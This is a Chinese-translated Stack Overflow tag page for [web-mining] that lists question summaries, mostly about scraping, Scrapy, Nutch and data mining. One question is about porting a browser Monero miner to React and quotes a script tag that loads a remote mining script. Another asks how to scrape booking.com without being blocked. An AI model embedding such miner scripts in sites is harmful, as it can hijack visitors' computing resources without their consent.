问题标签 [web-mining]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
2 回答
1526 浏览

python - 学位、亲近和等级声望

我想使用python为现有图形找到这三个Prestige 度量

  1. 学位声望
  2. 邻近声望
  3. 等级声望

我可以为此目的使用networkx吗?如果没有,那么我可以使用哪个库以及我该怎么做。任何链接或参考表示赞赏。

0 投票
1 回答
252 浏览

web-scraping - 抓取 AMP 版本的网页是否更容易?

我正在开发一个汇总报纸文章的网络抓取工具。我知道 AMP 协议要求使用精简版的 Javascript,而且我也知道 Javascript(部分)使网站管理员能够检测/防止抓取。所以从逻辑上讲,我认为抓取 AMP 网站会更容易。但是,另一方面,如果这是真的,我认为 StackOverflow 会在它之上,但我还没有找到一个线程来重申我的推论。我是正确的还是我忽略了什么?

0 投票
1 回答
186 浏览

data-mining - ECLAT算法找到最大和闭合频繁集

有人可以解释如何获得最大频繁项集和闭合频繁项集吗?我一直试图在网上寻找资源,但未能找到令人满意的解释来解决这个问题。在最大的情况下,我已经能够解决直到最终的支持表,但除此之外,我无法找到找到所需集合的方法。

0 投票
1 回答
515 浏览

python - 如何使用scrapy,xpath,python在锚标记中获取文本和href值

我有一个这样的 HTML 文件:

在文件夹 spiders 中,我有一个文件jacks.py,如下所示:

我在main.py中调用了 JokesSpider 类该文件位于根目录),这是我的代码

我想将数据写入 items.json,但是当我运行此代码时,items.json 中不包含任何内容,我该如何解决这个问题。非常感谢

0 投票
0 回答
97 浏览

python - 通过将 URL 从其他 *.py 文件传递​​给 Scrapy 从 url 中获取数据

我正在使用 Scrapy 从网站上抓取数据,这是我在 Scrapy 文件夹蜘蛛中的文件 spider.py 中的代码

ThumbSpider在文件main.py中调用类并在终端中运行此文件

我的程序没有从 2 个 url 中得到任何东西,但是当我取消注释start_urls = ['https://vietnamnews.vn/politics-laws', 'https://vietnamnews.vn/society']和删除类和文件 main.py 中的方法时__init__,编辑运行良好。我不知道发生了什么。任何人都可以帮助我,非常感谢start_requestsThumbSpiderprocess2.crawl(ThumbSpider, start_urls=msc.getUserChoices())process2.crawl(ThumbSpider)

0 投票
1 回答
129 浏览

javascript - 函数未从外部 js 文件导入反应

我正在从 EJS 模板迁移一个网络矿工来做出反应。下面的代码开始挖掘过程。

它从该 URL 加载必要的数据(包括函数 EverythingIsLife),然后运行它,在开始挖掘时向用户发送消息。但是,当我尝试在反应中做同样的事情时:

WebMinerPage.jsx:

在我的 index.html 的头部我有: <script src="https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean"></script>

它返回一个错误:

编译失败!EverythingisLife 没有定义。

我该如何解决这个问题?任何帮助,将不胜感激。

0 投票
1 回答
91 浏览

solr - Apache Nutch 仅索引 Solr 的文章页面

我已经设置了 Nutch 1.17 来抓取几个网站。像往常一样,高层可以有两种类型的网页。首先是类别页面或主页,不包含任何特定故事的详细信息,但提供多个页面的链接和短文本。其次,有些页面包含详细的完整故事信息,即文章。

现在我的问题是如何确定这是实际的文章页面,而该页面是类别页面。此外,我也有兴趣仅索引故事页面?

我认为 Nutch 默认没有任何东西。我怎样才能实现这种行为?

0 投票
1 回答
55 浏览

web-scraping - scrapy spider 的防御性网络抓取技术

我已经进行了大约 3 个月的网络抓取,并且我注意到我的许多蜘蛛需要经常照看,因为网站不断变化。我使用 scrapy、python 和 crawlera 来抓取我的网站。例如,两周前我创建了一个蜘蛛,但由于网站将它们的元标记从单数更改为复数(所以位置变成了位置),我不得不重新构建它。这么小的变化应该不会真的惹恼我的蜘蛛,所以我想对我的收藏采取更具防御性的方法。有没有人对网络抓取有任何建议以减少保姆?先感谢您!

0 投票
1 回答
284 浏览

python - 如何在 booking.com 上使用 scrapy 而不会被阻止?

我正在尝试使用 python 插件 scrapy 从 booking.com 抓取酒店评论。

我的问题是,scrapy 找不到所需的数据(例如负面反馈)。我认为,这是因为网站中嵌入了 javascript 代码。

因此,我尝试在 settings.py 文件中更改我的用户代理,但没有任何改变。然后我尝试模拟浏览器请求,但我不确定我是否正确执行。

这是我要抓取评论的酒店的链接:https ://www.booking.com/hotel/de/best-western-plus-marina-star-lindau.de.html

这是我的蜘蛛:

对于 settings.py 中的 User-Agent,我尝试了自己的 User-Agent 和 Google-Agent。

非常感谢您的帮助

0 投票
2 回答
462 浏览

python - 从 Twitter 用户列表 (csv) 中抓取加入日期/用户信息

我正在寻找一个可能非常简单的问题的解决方案,并且非常感谢一些帮助或提示。我有 python 和 webscraping 的基本知识。

我想在 Twitter 上探索某个主题标签及其背后的社区。使用twint,我已将所有提及主题标签的推文下载到 .csv 文件中。之后,我清理了 .csv,这样就没有同一用户的多个条目(来自具有相同主题标签的多个推文)并将其保存为 .txt。我现在想获得关于上述列表中大约 1.500 名用户的更多信息——主要是他们加入推特的日期,推文的数量将是一个奖励

我试过的: Twint 应该能够做到这一点,但它没有用(我正在使用他们 github 上提供的 docker 镜像)。我试图通过以下方式获取用户信息:

Twint 发出一条很长的错误消息,如果我理解正确的话,它与 twint 中的一个开放错误有关:

我试图遍历列表并让 twint 单独查找每个用户名,但它也不起作用:

用 Google Colab 运行它,我给了我

我在寻找 什么 获取列表中这些用户的加入日期的最简单的解决方案是什么?我应该使用不同的库吗?我可以用 beautifulsoup 之类的东西遍历列表并刮掉加入日期吗?我该怎么做?

非常感谢您的帮助,在此先感谢!